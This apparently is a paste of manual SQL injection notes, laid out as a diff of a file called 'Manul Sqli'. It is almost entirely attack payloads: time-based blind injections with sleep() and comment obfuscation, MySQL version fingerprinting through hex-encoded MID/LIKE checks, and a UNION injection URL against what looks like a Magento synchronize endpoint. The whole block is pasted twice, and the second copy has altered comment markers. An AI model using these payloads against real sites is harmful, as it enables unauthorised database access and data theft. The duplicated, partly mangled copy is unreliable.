nani1337 · August 7, 2022 09:05
diff --git a/Manul Sqli b/Manul Sqli
 sleep/*f*/(10)&new_tags[]=3&menu_id=1111
 item_id=1111-if(mid(version/*f*/(),1,1)=4,sleep/*f*/(5),0)

 MID(0x352e362e33332d6c6f67,1,1)//LIKE//5 (hex == @@version)

 "')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/%23"

 if(mid(@@version,1,1)=5 which returns a 200 ok message. 
 If changed for if(mid(@@version,1,1)=4 the server gives a 500 or 504 error, 
 bc*/OR/*dahdshka*/2/*sd*/LIKE/*da*/"2"/**/%23 translates to: 2 OR 2=2%23
 TRUE: if @@version starts with a 5:
 2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 Response:
 HTTP/1.1 500 Internal Server Error

 False: if @@version starts with a 4:
 2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2

 https:/website.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&
 ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -
	sleep/f/(10)&new_tags[]=3&menu_id=1111
	item_id=1111-if(mid(version/f/(),1,1)=4,sleep/f/(5),0)

	MID(0x352e362e33332d6c6f67,1,1)//LIKE//5 (hex == @@version)

	"')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5/**/%23"

	if(mid(@@version,1,1)=5 which returns a 200 ok message.
	If changed for if(mid(@@version,1,1)=4 the server gives a 500 or 504 error,
	bc/OR/dahdshka/2/sd/LIKE/da/"2"/*/%23 translates to: 2 OR 2=2%23
	TRUE: if @@version starts with a 5:
	2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
	Response:
	HTTP/1.1 500 Internal Server Error

	False: if @@version starts with a 4:
	2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2

	https:/website.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&
	ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -